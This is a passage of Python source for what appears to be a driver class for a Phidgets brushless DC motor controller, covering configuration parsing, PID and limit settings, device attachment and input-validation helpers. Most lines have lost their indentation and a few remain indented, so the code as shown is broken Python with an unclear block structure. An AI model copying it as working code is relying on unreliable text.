else:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: Must initialize object with 'DesiredDeviceID' argument.")
return
print("DesiredDeviceID: " + str(self.DesiredDeviceID))
#########################################################
#########################################################
if "NameToDisplay_UserSet" in setup_dict:
self.NameToDisplay_UserSet = str(setup_dict["NameToDisplay_UserSet"])
else:
self.NameToDisplay_UserSet = ""
print("NameToDisplay_UserSet: " + str(self.NameToDisplay_UserSet))
#########################################################
##########################################
if "MainThread_TimeToSleepEachLoop" in setup_dict:
self.MainThread_TimeToSleepEachLoop = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("MainThread_TimeToSleepEachLoop", setup_dict["MainThread_TimeToSleepEachLoop"], 0.001, 100000)
else:
self.MainThread_TimeToSleepEachLoop = 0.005
print("MainThread_TimeToSleepEachLoop: " + str(self.MainThread_TimeToSleepEachLoop))
##########################################
#########################################################
if "ENABLE_GETS_MAINTHREAD" in setup_dict:
self.ENABLE_GETS_MAINTHREAD = int(setup_dict["ENABLE_GETS_MAINTHREAD"])
if self.ENABLE_GETS_MAINTHREAD != 0 and self.ENABLE_GETS_MAINTHREAD != 1:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: ENABLE_GETS_MAINTHREAD in setup dict must be 0 or 1.")
return
else:
self.ENABLE_GETS_MAINTHREAD = 0
print("ENABLE_GETS_MAINTHREAD: " + str(self.ENABLE_GETS_MAINTHREAD))
#########################################################
#########################################################
if "ControlMode" in setup_dict:
self.ControlMode = str(setup_dict["ControlMode"]).lower()
if self.ControlMode != "position" and self.ControlMode != "velocity":
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: ControlMode in setup dict must be 'position' or 'velocity'.")
return
else:
self.ControlMode = "velocity"
print("ControlMode: " + self.ControlMode)
#########################################################
##########################################
if "UpdateDeltaT_ms" in setup_dict:
if self.ControlMode == "position":
self.UpdateDeltaT_ms = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("UpdateDeltaT_ms", setup_dict["UpdateDeltaT_ms"], 20.0, 60000.0))
elif self.ControlMode == "velocity":
self.UpdateDeltaT_ms = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("UpdateDeltaT_ms", setup_dict["UpdateDeltaT_ms"], 100.0, 60000.0))
else:
if self.ControlMode == "position":
self.UpdateDeltaT_ms = int(20.0)
elif self.ControlMode == "velocity":
self.UpdateDeltaT_ms = int(100.0)
print("UpdateDeltaT_ms: " + str(self.UpdateDeltaT_ms))
##########################################
##########################################
if "FailsafeTime_Milliseconds" in setup_dict:
self.FailsafeTime_Milliseconds = int(self.PassThroughFloatValuesInRange_ExitProgramOtherwise("FailsafeTime_Milliseconds", setup_dict["FailsafeTime_Milliseconds"], 500.0, 30000.0))
else:
            if self.ControlMode == "position":
                self.FailsafeTime_Milliseconds = int(1000.0)
            elif self.ControlMode == "velocity":
                self.FailsafeTime_Milliseconds = int(1000.0) #Assumed default, mirroring the "position" case so the variable is always defined
print("FailsafeTime_Milliseconds: " + str(self.FailsafeTime_Milliseconds))
##########################################
#########################################################
if "PositionMinLimit_PhidgetsUnits_UserSet" in setup_dict:
self.PositionMinLimit_PhidgetsUnits_UserSet = setup_dict["PositionMinLimit_PhidgetsUnits_UserSet"]
else:
self.PositionMinLimit_PhidgetsUnits_UserSet = -7.24637681159e+12
print("PositionMinLimit_PhidgetsUnits_UserSet: " + str(self.PositionMinLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "PositionMaxLimit_PhidgetsUnits_UserSet" in setup_dict:
self.PositionMaxLimit_PhidgetsUnits_UserSet = setup_dict["PositionMaxLimit_PhidgetsUnits_UserSet"]
else:
self.PositionMaxLimit_PhidgetsUnits_UserSet = 7.24637681159e+12
print("PositionMaxLimit_PhidgetsUnits_UserSet: " + str(self.PositionMaxLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
        if self.PositionMaxLimit_PhidgetsUnits_UserSet < self.PositionMinLimit_PhidgetsUnits_UserSet:
            self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
            print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: PositionMinLimit_PhidgetsUnits_UserSet must be smaller than PositionMaxLimit_PhidgetsUnits_UserSet!")
            return
#########################################################
#########################################################
if "VelocityMinLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
if setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], 0.0, 10000.0)
else:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], -10000.0, 0.0)
elif self.ControlMode == "velocity":
if setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], 0.0, 1.0)
else:
self.VelocityMinLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMinLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMinLimit_PhidgetsUnits_UserSet"], -1.0, 0.0)
else:
if self.ControlMode == "position":
self.VelocityMinLimit_PhidgetsUnits_UserSet = -10000.0
elif self.ControlMode == "velocity":
self.VelocityMinLimit_PhidgetsUnits_UserSet = -1.0
print("VelocityMinLimit_PhidgetsUnits_UserSet: " + str(self.VelocityMinLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "VelocityMaxLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
if setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], 0.0, 10000.0)
else:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], -10000.0, 0.0)
elif self.ControlMode == "velocity":
if setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"] > 0:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], 0.0, 1.0)
else:
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityMaxLimit_PhidgetsUnits_UserSet", setup_dict["VelocityMaxLimit_PhidgetsUnits_UserSet"], -1.0, 0.0)
else:
if self.ControlMode == "position":
self.VelocityMaxLimit_PhidgetsUnits_UserSet = 10000.0
elif self.ControlMode == "velocity":
self.VelocityMaxLimit_PhidgetsUnits_UserSet = 1.0
print("VelocityMaxLimit_PhidgetsUnits_UserSet: " + str(self.VelocityMaxLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
        if self.VelocityMaxLimit_PhidgetsUnits_UserSet < self.VelocityMinLimit_PhidgetsUnits_UserSet:
            self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
            print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__ ERROR: VelocityMinLimit_PhidgetsUnits_UserSet must be smaller than VelocityMaxLimit_PhidgetsUnits_UserSet!")
            return
#########################################################
#########################################################
if "VelocityStallLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
self.VelocityStallLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityStallLimit_PhidgetsUnits_UserSet", setup_dict["VelocityStallLimit_PhidgetsUnits_UserSet"], 0.0, 2000.0)
elif self.ControlMode == "velocity":
self.VelocityStallLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("VelocityStallLimit_PhidgetsUnits_UserSet", setup_dict["VelocityStallLimit_PhidgetsUnits_UserSet"], 0.0, 2000.0)
else:
if self.ControlMode == "position":
self.VelocityStallLimit_PhidgetsUnits_UserSet = 2000.0
elif self.ControlMode == "velocity":
self.VelocityStallLimit_PhidgetsUnits_UserSet = 2000.0
print("VelocityStallLimit_PhidgetsUnits_UserSet: " + str(self.VelocityStallLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "BrakingStrengthLimit_VelControl_Percent_UserSet" in setup_dict:
self.BrakingStrengthLimit_VelControl_Percent_UserSet = float(setup_dict["BrakingStrengthLimit_VelControl_Percent_UserSet"])
if self.BrakingStrengthLimit_VelControl_Percent_UserSet < 0.0 or self.BrakingStrengthLimit_VelControl_Percent_UserSet > 100.0:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("ERROR: BrakingStrengthLimit_VelControl_Percent_UserSet must be between 0.0 an 100.0 percent.")
return
else:
self.BrakingStrengthLimit_VelControl_Percent_UserSet = 50.0
print("BrakingStrengthLimit_VelControl_Percent_UserSet: " + str(self.BrakingStrengthLimit_VelControl_Percent_UserSet))
#########################################################
#########################################################
if "DeadBand_PosControl_PhidgetsUnits_UserSet" in setup_dict:
self.DeadBand_PosControl_PhidgetsUnits_UserSet = float(setup_dict["DeadBand_PosControl_PhidgetsUnits_UserSet"])
if self.DeadBand_PosControl_PhidgetsUnits_UserSet < 0.0:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("ERROR: self.DeadBand_PosControl_PhidgetsUnits_UserSet must be grater than 0.")
return
else:
self.DeadBand_PosControl_PhidgetsUnits_UserSet = 0.0
print("DeadBand_PosControl_PhidgetsUnits_UserSet: " + str(self.DeadBand_PosControl_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "AccelerationMaxLimit_PhidgetsUnits_UserSet" in setup_dict:
if self.ControlMode == "position":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("AccelerationMaxLimit_PhidgetsUnits_UserSet", setup_dict["AccelerationMaxLimit_PhidgetsUnits_UserSet"], 0.1, 100000.0)
elif self.ControlMode == "velocity":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("AccelerationMaxLimit_PhidgetsUnits_UserSet", setup_dict["AccelerationMaxLimit_PhidgetsUnits_UserSet"], 0.1, 100.0)
else:
if self.ControlMode == "position":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = 50000.0
elif self.ControlMode == "velocity":
self.AccelerationMaxLimit_PhidgetsUnits_UserSet = 50.0
print("AccelerationMaxLimit_PhidgetsUnits_UserSet: " + str(self.AccelerationMaxLimit_PhidgetsUnits_UserSet))
#########################################################
#########################################################
if "Kp_PosControl_Gain_UserSet" in setup_dict:
self.Kp_PosControl_Gain_UserSet = float(setup_dict["Kp_PosControl_Gain_UserSet"])
else:
self.Kp_PosControl_Gain_UserSet = 20000.0
print("Kp_PosControl_Gain_UserSet: " + str(self.Kp_PosControl_Gain_UserSet))
#########################################################
#########################################################
if "Ki_PosControl_Gain_UserSet" in setup_dict:
self.Ki_PosControl_Gain_UserSet = float(setup_dict["Ki_PosControl_Gain_UserSet"])
else:
self.Ki_PosControl_Gain_UserSet = 2.0
print("Ki_PosControl_Gain_UserSet: " + str(self.Ki_PosControl_Gain_UserSet))
#########################################################
#########################################################
if "Kd_PosControl_Gain_UserSet" in setup_dict:
self.Kd_PosControl_Gain_UserSet = float(setup_dict["Kd_PosControl_Gain_UserSet"])
else:
self.Kd_PosControl_Gain_UserSet = 40000.0
print("Kd_PosControl_Gain_UserSet: " + str(self.Kd_PosControl_Gain_UserSet))
#########################################################
#########################################################
if "RescaleFactor_MultipliesPhidgetsUnits_UserSet" in setup_dict:
self.RescaleFactor_MultipliesPhidgetsUnits_UserSet = float(setup_dict["RescaleFactor_MultipliesPhidgetsUnits_UserSet"])
if self.RescaleFactor_MultipliesPhidgetsUnits_UserSet < 0.0:
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
print("ERROR: self.RescaleFactor_MultipliesPhidgetsUnits_UserSet must be grater than 0.")
return
else:
self.RescaleFactor_MultipliesPhidgetsUnits_UserSet = 1.0
print("RescaleFactor_MultipliesPhidgetsUnits_UserSet: " + str(self.RescaleFactor_MultipliesPhidgetsUnits_UserSet))
print("-----------------------------------------------------------------------"
"\nFROM PHIDGETS BRUSHLESS DC MOTOR CONTROLLER USER'S GUIDE:"
"\nInstead of steps, brushless DC motors work in commutations. "
"\nThe number of commutations per rotation is equal to the number of poles multiplied by the number of phases. "
"\nSo, if you have an 8-Pole, 3-Phase motor, the motor will have 24 commutations per rotation. "
"\nFor this motor, to change the target position units from communications to rotations, you would set the rescale factor to 1/24, or 0.0416."
"\n-----------------------------------------------------------------------")
#########################################################
#########################################################
self.PrintToGui_Label_TextInputHistory_List = [" "]*self.NumberOfPrintLines
self.PrintToGui_Label_TextInput_Str = ""
self.GUI_ready_to_be_updated_flag = 0
#########################################################
#########################################################
self.CurrentTime_CalculatedFromMainThread = -11111.0
self.LastTime_CalculatedFromMainThread = -11111.0
self.StartingTime_CalculatedFromMainThread = -11111.0
self.DataStreamingFrequency_CalculatedFromMainThread = -11111.0
self.DataStreamingDeltaT_CalculatedFromMainThread = -11111.0
self.CurrentTime_OnPositionChangeCallbackFunction = -11111.0
self.LastTime_OnPositionChangeCallbackFunction = -11111.0
self.DataStreamingFrequency_OnPositionChangeCallbackFunction = -11111.0
self.DataStreamingDeltaT_OnPositionChangeCallbackFunction = -11111.0
self.LastTime_FailsafeWasReset = -11111.0
self.DetectedDeviceName = "default"
self.DetectedDeviceID = "default"
self.DetectedDeviceVersion = "default"
self.StopMotor_NeedsToBeChangedFlag = 0
self.Temperature_DegC_FromDevice = -11111.0
self.Position_PhidgetsUnits_FromDevice = -11111.0
self.Position_PhidgetsUnits_FromDevice_Last = -11111.0
self.Position_PhidgetsUnits_TO_BE_SET = 0.0
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.VelocityStall_PhidgetsUnits_FromDevice = -11111.0
self.Velocity_PhidgetsUnits_FromDevice = -11111.0
self.Velocity_PhidgetsUnits_TO_BE_SET = 0.0
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_DifferentiatedRaw = -11111.0
self.Velocity_PhidgetsUnits_DifferentiatedSmoothed = -11111.0
self.DutyCycle_PhidgetsUnits_FromDevice = -11111
self.Acceleration_PhidgetsUnits_FromDevice = -11111
self.Acceleration_PhidgetsUnits_TO_BE_SET = 0.0
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.DeadBand_PosControl_PhidgetsUnits_FromDevice = -11111
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = 0.0
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 0
self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
self.EngagedState_PhidgetsUnits_FromDevice = -11111
self.EngagedState_TO_BE_SET = -1
self.EngagedState_NeedsToBeChangedFlag = 0
self.HomeMotorInPlace_NeedsToBeHomedFlag = 0
self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 0
#########################################################
#########################################################
try:
self.Velocity_LowPassFilter_ReubenPython2and3ClassObject = LowPassFilter_ReubenPython2and3Class(dict([("UseMedianFilterFlag", 0),
("UseExponentialSmoothingFilterFlag", 1),
("ExponentialSmoothingFilterLambda", 0.2)]))
time.sleep(0.1)
self.VELOCITY_LOWPASSFILTER_OPEN_FLAG = self.Velocity_LowPassFilter_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
            if self.VELOCITY_LOWPASSFILTER_OPEN_FLAG != 1:
print("Failed to open LowPassFilter_ReubenPython2and3ClassObject.")
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
return
except:
exceptions = sys.exc_info()[0]
print("LowPassFilter_ReubenPython2and3Class __init__: Exceptions: %s" % exceptions)
#########################################################
#########################################################
self.BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet = 0.01 * self.BrakingStrengthLimit_VelControl_Percent_UserSet * 1.0 #self.BrakingStrengthStallLimit_PhidgetsUnits_FromDevice
print("BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet: " + str(self.BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet))
#########################################################
#########################################################
try:
self.TemperatureObject = TemperatureSensor()
print("Created TemperatureSensor object.")
if self.ControlMode == "velocity":
self.BLDCobject = BLDCMotor() #Create a BLDCMotor object for velocity control
print("Created BLDCMotor object.")
elif self.ControlMode == "position":
self.BLDCobject = MotorPositionController() #Create a MotorPositionController object for position control
print("Created MotorPositionController object.")
except PhidgetException as e:
print("Failed to create main motor object, exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.BLDCobject.setDeviceSerialNumber(self.VINT_DesiredSerialNumber)
except PhidgetException as e:
print("Failed to call 'setDeviceSerialNumber()', exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.BLDCobject.setHubPort(self.VINT_DesiredPortNumber)
except PhidgetException as e:
print("Failed to call 'setHubPort()', exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.TemperatureObject.setOnAttachHandler(self.TemperatureOnAttachCallback)
self.TemperatureObject.setOnDetachHandler(self.TemperatureOnDetachCallback)
self.TemperatureObject.setOnTemperatureChangeHandler(self.TemperatureOnChangeCallback)
self.TemperatureObject.setOnErrorHandler(self.TemperatureOnErrorCallback)
if self.ControlMode == "velocity":
self.BLDCobject.setOnAttachHandler(self.BLDConAttachCallback)
self.BLDCobject.setOnDetachHandler(self.BLDConDetachCallback)
self.BLDCobject.setOnVelocityUpdateHandler(self.BLDConVelocityUpdateCallback)
self.BLDCobject.setOnPositionChangeHandler(self.BLDConPositionChangeCallback)
self.BLDCobject.setOnErrorHandler(self.BLDConErrorCallback)
elif self.ControlMode == "position":
self.BLDCobject.setOnAttachHandler(self.BLDConAttachCallback)
self.BLDCobject.setOnDetachHandler(self.BLDConDetachCallback)
self.BLDCobject.setOnDutyCycleUpdateHandler(self.BLDConDutyCycleUpdateCallback)
self.BLDCobject.setOnPositionChangeHandler(self.BLDConPositionChangeCallback)
self.BLDCobject.setOnErrorHandler(self.BLDConErrorCallback)
print("Set callback functions.")
self.BLDCobject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
self.TemperatureObject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
self.device_connected_flag = 1
print("Attached the BLDC object.")
except PhidgetException as e:
self.device_connected_flag = 0
print("Failed to call 'openWaitForAttachment()', exception: %i: %s" % (e.code, e.details))
try:
self.BLDCobject.close()
print("Closed the BLDC object.")
except PhidgetException as e:
print("Failed to call 'close()', exception: %i: %s" % (e.code, e.details))
#########################################################
#########################################################
#########################################################
if self.device_connected_flag == 1:
#########################################################
if self.UsePhidgetsLoggingInternalToThisClassObjectFlag == 1:
try:
                    Log.enable(LogLevel.PHIDGET_LOG_INFO, os.path.join(os.getcwd(), "PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class_PhidgetLog_INFO.txt"))
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__Enabled Phidget Logging.")
except PhidgetException as e:
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class __init__Failed to enable Phidget Logging, Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceName = self.BLDCobject.getDeviceName()
print("DetectedDeviceName: " + self.DetectedDeviceName)
except PhidgetException as e:
print("Failed to call 'getDeviceName', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.VINT_DetectedSerialNumber = self.BLDCobject.getDeviceSerialNumber()
print("VINT_DetectedSerialNumber: " + str(self.VINT_DetectedSerialNumber))
except PhidgetException as e:
print("Failed to call 'getDeviceSerialNumber', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceID = self.BLDCobject.getDeviceID()
print("DetectedDeviceID: " + str(self.DetectedDeviceID))
except PhidgetException as e:
print("Failed to call 'getDeviceID', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceVersion = self.BLDCobject.getDeviceVersion()
print("DetectedDeviceVersion: " + str(self.DetectedDeviceVersion))
except PhidgetException as e:
print("Failed to call 'getDeviceVersion', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
try:
self.DetectedDeviceLibraryVersion = self.BLDCobject.getLibraryVersion()
print("DetectedDeviceLibraryVersion: " + str(self.DetectedDeviceLibraryVersion))
except PhidgetException as e:
print("Failed to call 'getLibraryVersion', Phidget Exception %i: %s" % (e.code, e.details))
#########################################################
#########################################################
if self.VINT_DetectedSerialNumber != self.VINT_DesiredSerialNumber:
print("The desired VINT_DesiredSerialNumber (" + str(self.VINT_DesiredSerialNumber) + ") does not match the detected serial number (" + str(self.VINT_DetectedSerialNumber) + ").")
input("Press any key (and enter) to exit.")
sys.exit()
#########################################################
#########################################################
if self.DetectedDeviceID != self.DesiredDeviceID:
print("The DesiredDeviceID (" + str(self.DesiredDeviceID) + ") does not match the detected Device ID (" + str(self.DetectedDeviceID) + ").")
input("Press any key (and enter) to exit.")
sys.exit()
#########################################################
#########################################################
try:
############################
self.FailsafeTimeMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinFailsafeTime()
print("FailsafeTimeMinLimit_PhidgetsUnits_FromDevice: " + str(self.FailsafeTimeMinLimit_PhidgetsUnits_FromDevice))
self.FailsafeTimeMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxFailsafeTime()
print("FailsafeTimeMaxLimit_PhidgetsUnits_FromDevice: " + str(self.FailsafeTimeMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
self.PositionMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinPosition()
print("PositionMinLimit_PhidgetsUnits_FromDevice: " + str(self.PositionMinLimit_PhidgetsUnits_FromDevice))
self.PositionMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxPosition()
print("PositionMaxLimit_PhidgetsUnits_FromDevice: " + str(self.PositionMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
if self.ControlMode == "velocity":
self.VelocityMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinVelocity()
self.VelocityMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxVelocity()
elif self.ControlMode == "position":
self.VelocityMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinVelocityLimit()
self.VelocityMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxVelocityLimit()
print("VelocityMinLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMinLimit_PhidgetsUnits_FromDevice))
print("VelocityMaxLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
self.VelocityMinStallLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinStallVelocity()
self.VelocityMaxStallLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxStallVelocity()
print("VelocityMinStallLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMinStallLimit_PhidgetsUnits_FromDevice))
print("VelocityMaxStallLimit_PhidgetsUnits_FromDevice: " + str(self.VelocityMaxStallLimit_PhidgetsUnits_FromDevice))
############################
############################
self.AccelerationMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinAcceleration()
print("AccelerationMinLimit_PhidgetsUnits_FromDevice: " + str(self.AccelerationMinLimit_PhidgetsUnits_FromDevice))
self.AccelerationMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxAcceleration()
print("AccelerationMaxLimit_PhidgetsUnits_FromDevice: " + str(self.AccelerationMaxLimit_PhidgetsUnits_FromDevice))
############################
############################
self.DataIntervalMin = self.BLDCobject.getMinDataInterval()
print("DataIntervalMin: " + str(self.DataIntervalMin))
self.DataIntervalMax = self.BLDCobject.getMaxDataInterval()
print("DataIntervalMax: " + str(self.DataIntervalMax))
############################
############################
if self.ControlMode == "velocity":
self.BrakingStrengthMinLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMinBrakingStrength()
self.BrakingStrengthMaxLimit_PhidgetsUnits_FromDevice = self.BLDCobject.getMaxBrakingStrength()
print("BrakingStrengthMinLimit_PhidgetsUnits_FromDevice: " + str(self.BrakingStrengthMinLimit_PhidgetsUnits_FromDevice))
print("BrakingStrengthMaxLimit_PhidgetsUnits_FromDevice: " + str(self.BrakingStrengthMaxLimit_PhidgetsUnits_FromDevice))
############################
except PhidgetException as e:
print("Failed to motor limits, Phidget Exception %i: %s" % (e.code, e.details))
traceback.print_exc()
return
self.MostRecentDataDict = dict([("Position_PhidgetsUnits_FromDevice", self.Position_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_FromDevice", self.Velocity_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_DifferentiatedRaw", self.Velocity_PhidgetsUnits_DifferentiatedRaw),
("Velocity_PhidgetsUnits_DifferentiatedSmoothed", self.Velocity_PhidgetsUnits_DifferentiatedSmoothed),
("DutyCycle_PhidgetsUnits_FromDevice", self.DutyCycle_PhidgetsUnits_FromDevice),
("Temperature_DegC_FromDevice", self.Temperature_DegC_FromDevice),
("Time", self.CurrentTime_CalculatedFromMainThread)])
#########################################################
##########################################
self.MainThread_ThreadingObject = threading.Thread(target=self.MainThread, args=())
self.MainThread_ThreadingObject.start()
##########################################
##########################################
if self.USE_GUI_FLAG == 1:
self.StartGUI(self.root)
##########################################
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 1
else:
print("---------- Failed to open PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class for serial number " + str(self.VINT_DesiredSerialNumber) + " ----------")
self.OBJECT_CREATED_SUCCESSFULLY_FLAG = 0
return
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def __del__(self):
pass
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def IsNumber0or1(self, InputNumber):
if float(InputNumber) == 0.0 or float(InputNumber) == 1.0:
return 1
else:
return 0
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def PassThrough0and1values_ExitProgramOtherwise(self, InputNameString, InputNumber):
try:
InputNumber_ConvertedToFloat = float(InputNumber)
except:
exceptions = sys.exc_info()[0]
print("PassThrough0and1values_ExitProgramOtherwise Error. InputNumber must be a float value, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
try:
if InputNumber_ConvertedToFloat == 0.0 or InputNumber_ConvertedToFloat == 1.0:
return InputNumber_ConvertedToFloat
else:
input("PassThrough0and1values_ExitProgramOtherwise Error. '" +
InputNameString +
"' must be 0 or 1 (value was " +
str(InputNumber_ConvertedToFloat) +
"). Press any key (and enter) to exit.")
sys.exit()
except:
exceptions = sys.exc_info()[0]
print("PassThrough0and1values_ExitProgramOtherwise Error, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def PassThroughFloatValuesInRange_ExitProgramOtherwise(self, InputNameString, InputNumber, RangeMinValue, RangeMaxValue):
try:
InputNumber_ConvertedToFloat = float(InputNumber)
except:
exceptions = sys.exc_info()[0]
print("PassThroughFloatValuesInRange_ExitProgramOtherwise Error. InputNumber must be a float value, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
try:
if InputNumber_ConvertedToFloat >= RangeMinValue and InputNumber_ConvertedToFloat <= RangeMaxValue:
return InputNumber_ConvertedToFloat
else:
input("PassThroughFloatValuesInRange_ExitProgramOtherwise Error. '" +
InputNameString +
"' must be in the range [" +
str(RangeMinValue) +
", " +
str(RangeMaxValue) +
"] (value was " +
str(InputNumber_ConvertedToFloat) + "). Press any key (and enter) to exit.")
sys.exit()
except:
exceptions = sys.exc_info()[0]
print("PassThroughFloatValuesInRange_ExitProgramOtherwise Error, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
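#A hedged usage sketch for the two pass-through validators above (the setup_dict name and keys below are
#illustrative assumptions, not shown in this excerpt):
#
#   self.USE_GUI_FLAG = self.PassThrough0and1values_ExitProgramOtherwise("USE_GUI_FLAG", setup_dict["USE_GUI_FLAG"])
#   self.GUI_PADX = self.PassThroughFloatValuesInRange_ExitProgramOtherwise("GUI_PADX", setup_dict["GUI_PADX"], 0.0, 100.0)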
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
